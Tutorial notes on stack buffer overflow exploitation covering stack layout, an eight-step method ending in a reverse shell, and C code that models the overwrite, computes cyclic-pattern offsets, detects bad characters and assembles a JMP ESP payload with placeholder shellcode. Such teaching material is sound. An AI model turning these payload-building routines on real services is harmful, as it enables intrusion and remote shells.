Anatomy of Memory


Anatomy of The Stack

ESP (Top) | Buffer Space | EBP (Bottom) | EIP/Return Address

The buffer sits between ESP (the top of the stack, at the lowest address) and the saved EBP. As input is written into it, the buffer fills in the downward direction of the diagram, that is, toward higher addresses and toward EBP. If the program bounds-checks its input properly, then sending a large number of characters at it, say a long run of A's, fills the buffer and stops before EBP: the buffer only ever holds as many bytes as it was sized for.

With a buffer overflow, however, the input is longer than the buffer and there is no check, so the write keeps going past the end of the buffer, over the saved EBP, and into the saved return address, the value that will be loaded into EIP when the function returns.

EIP is where things get interesting. The saved return address is a pointer: when the function executes RET, the CPU pops that value into EIP and continues executing at that address. If we control those four bytes, we control where execution goes next, and we can send it to code we placed on the stack ourselves: shellcode that connects back to us with a reverse shell. Because the same overflow that reaches EIP also writes the rest of the stack above it, the shellcode can ride in on the same input. Control the stack, control the return address, and you have a shell. One caveat: the shell runs with the privileges of the exploited process, so it is root (or SYSTEM on Windows) only when the vulnerable service itself runs with those privileges.
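The frame above, as an added example that is not part of the original notes: a constructed model of a 64-byte buffer with the saved EBP and return address laid out directly above it, an unchecked copy that writes straight through both, and the bounded copy that refuses oversized input. The frame is a plain struct rather than a real process stack, so the overwrite can be observed without crashing anything; the initial return address 0x08048abc is an arbitrary sample value.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64u

/* Constructed model of the frame drawn in the notes. In memory the
 * buffer sits lowest, the caller's saved EBP directly above it, and the
 * saved return address (what the notes call EIP) above that. */
struct frame {
    char     buf[BUF_SIZE];   /* local buffer: fills toward higher addresses */
    uint32_t saved_ebp;       /* caller's frame pointer, restored on LEAVE */
    uint32_t ret_addr;        /* popped into EIP on RET */
};

/* The vulnerable pattern: copy attacker-controlled input into the
 * buffer with the input's length, not the buffer's. memcpy over the
 * whole frame models an unchecked strcpy(): bytes 0..63 land in buf,
 * 64..67 in saved_ebp, 68..71 in ret_addr. Returns the address the
 * function would now return to. */
uint32_t vulnerable_copy(struct frame *f, const unsigned char *input, size_t len)
{
    if (len > sizeof *f)          /* the model stops at the frame edge */
        len = sizeof *f;
    memcpy(f, input, len);        /* no check against BUF_SIZE */
    return f->ret_addr;
}

/* The fix: bound the copy by the buffer size and reject input that does
 * not fit instead of silently truncating it. Returns 0 on success. */
int safe_copy(struct frame *f, const unsigned char *input, size_t len)
{
    if (len >= BUF_SIZE)
        return -1;
    memcpy(f->buf, input, len);
    f->buf[len] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed input: 64 A's fill the buffer, 4 B's cover EBP, 4 C's cover EIP */
    unsigned char input[BUF_SIZE + 8];
    memset(input, 'A', BUF_SIZE);
    memset(input + BUF_SIZE, 'B', 4);
    memset(input + BUF_SIZE + 4, 'C', 4);

    struct frame f;
    memset(&f, 0, sizeof f);
    f.ret_addr = 0x08048abcu;       /* sample legitimate return address */
    uint32_t eip = vulnerable_copy(&f, input, sizeof input);
    printf("vulnerable: saved EBP=0x%08x  EIP=0x%08x\n", f.saved_ebp, eip);

    struct frame g;
    memset(&g, 0, sizeof g);
    g.ret_addr = 0x08048abcu;
    int rc = safe_copy(&g, input, sizeof input);
    printf("safe: rc=%d  EIP=0x%08x (unchanged)\n", rc, g.ret_addr);
    return 0;
}
```

The EIP value printed by the vulnerable path is 0x43434343, the four C's read back as a little-endian integer; that reversal is why a crash value seen in a debugger must be byte-swapped before searching for it in the input.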


Steps To Conduct a Buffer Overflow

This process is divided into 8 steps:

  1. Spiking: sending malformed input to each command or function the program exposes to find which one is vulnerable.
  2. Fuzzing: sending increasingly long strings of characters to that command to see whether we can crash it.
  3. Finding the offset: once it crashes, working out exactly how many bytes it took to reach EIP. That number is the offset.
  4. Overwriting the EIP: using the offset to place four bytes of our choosing exactly in EIP, which confirms we control it. With EIP control, two pieces of housekeeping remain:
  5. Finding bad characters: bytes the program mangles or truncates on the way in (0x00 almost always, often 0x0A and 0x0D) which must be excluded from the shellcode.
  6. Finding the right module: a module (the executable or a DLL it loads) without memory protections such as ASLR, DEP or SafeSEH that contains a JMP ESP instruction; its address is what goes into EIP.
  7. Generating shellcode: with the information from steps 5 and 6, generating the reverse-shell shellcode with the bad characters excluded.
  8. Getting root: pointing EIP at the JMP ESP address from step 6, placing the shellcode right after it so the jump lands in it, sending the exploit and catching the reverse shell. It runs as root (or SYSTEM) if the service does.
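The offset, bad-character and payload-assembly steps (3, 5, 7 and 8) carried through in code, as an added example that is not part of the original notes or of any tool they mention. It assumes the Metasploit-style cyclic pattern (Aa0Aa1Aa2...) for step 3; the crash value 0x386F4337, the JMP ESP address 0x625011AF and the 0xCC placeholder shellcode are constructed sample values, and the "received" buffer in the bad-character check is constructed to simulate a program that turns 0x0A into 0x00.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_MAX 20280u   /* 26 * 26 * 10 triples * 3 bytes */

/* Step 3: Metasploit-style cyclic pattern "Aa0Aa1Aa2...". Every 4-byte
 * window is unique within one full cycle, so the value that lands in
 * EIP at the crash identifies where in the input it came from. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                const char trip[3] = { a, b, c };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    return n;
}

/* Step 3: given the EIP value read from the debugger at the crash, find
 * its offset in the pattern. x86 is little-endian, so the four bytes
 * that were overwritten appear in EIP reversed. Returns -1 if absent. */
long pattern_offset(uint32_t eip)
{
    static char pat[PATTERN_MAX];
    size_t n = pattern_create(pat, sizeof pat);
    const unsigned char needle[4] = {
        (unsigned char)eip, (unsigned char)(eip >> 8),
        (unsigned char)(eip >> 16), (unsigned char)(eip >> 24)
    };
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Step 5: diff the bytes sent (0x01..0xFF, 0x00 is excluded up front)
 * against what the debugger shows on the stack. A mangled byte shows as
 * a single mismatch; a byte that truncates the string makes everything
 * after it mismatch too, so stop there: exclude it, resend, repeat. */
size_t find_badchars(const unsigned char *sent, const unsigned char *received,
                     size_t len, unsigned char *bad, size_t bad_max)
{
    size_t count = 0;
    for (size_t i = 0; i < len && count < bad_max; i++) {
        if (sent[i] == received[i])
            continue;
        bad[count++] = sent[i];
        if (i + 1 < len && sent[i + 1] != received[i + 1])
            break;                      /* truncated, not just mangled */
    }
    return count;
}

/* Steps 4, 7 and 8: assemble the final buffer as
 *   [offset filler][EIP = JMP ESP address, little-endian][NOP sled][shellcode]
 * After RET, ESP points just past the overwritten return address, i.e.
 * at the sled, so JMP ESP slides into the shellcode. Returns 0 if the
 * buffer is too small or the shellcode contains a known bad character. */
size_t build_payload(unsigned char *out, size_t out_max, size_t offset,
                     uint32_t jmp_esp, const unsigned char *shellcode,
                     size_t sc_len, size_t nops,
                     const unsigned char *bad, size_t bad_len)
{
    size_t total = offset + 4 + nops + sc_len;
    if (total > out_max)
        return 0;
    for (size_t i = 0; i < sc_len; i++)
        for (size_t j = 0; j < bad_len; j++)
            if (shellcode[i] == bad[j])
                return 0;
    memset(out, 'A', offset);
    out[offset + 0] = (unsigned char)jmp_esp;
    out[offset + 1] = (unsigned char)(jmp_esp >> 8);
    out[offset + 2] = (unsigned char)(jmp_esp >> 16);
    out[offset + 3] = (unsigned char)(jmp_esp >> 24);
    memset(out + offset + 4, 0x90, nops);
    memcpy(out + offset + 4 + nops, shellcode, sc_len);
    return total;
}

int main(void)
{
    long off = pattern_offset(0x386F4337u);           /* sample crash EIP */
    printf("offset: %ld\n", off);

    unsigned char sent[255], recv[255], bad[16];
    for (int i = 0; i < 255; i++) sent[i] = recv[i] = (unsigned char)(i + 1);
    recv[0x0A - 1] = 0x00;                           /* constructed: 0x0A mangled */
    size_t nbad = find_badchars(sent, recv, sizeof sent, bad, sizeof bad);
    printf("bad chars found: %zu (first 0x%02x)\n", nbad, nbad ? bad[0] : 0);

    static unsigned char payload[4096];
    const unsigned char sc[] = { 0xCC, 0xCC, 0xCC, 0xCC }; /* stand-in for msfvenom output */
    const unsigned char excl[] = { 0x00, 0x0A };
    size_t len = build_payload(payload, sizeof payload, (size_t)off,
                               0x625011AFu, sc, sizeof sc, 16, excl, sizeof excl);
    printf("payload length: %zu\n", len);
    return 0;
}
```

The sample crash value resolves to offset 2003: bytes 0x37 0x43 0x6F 0x38 in EIP are "7Co8" in the pattern, read back in reverse. The payload written into `payload` is what the final send replaces the fuzzing string with; msfvenom output (with the bad characters passed to `-b`) takes the place of the 0xCC stand-in.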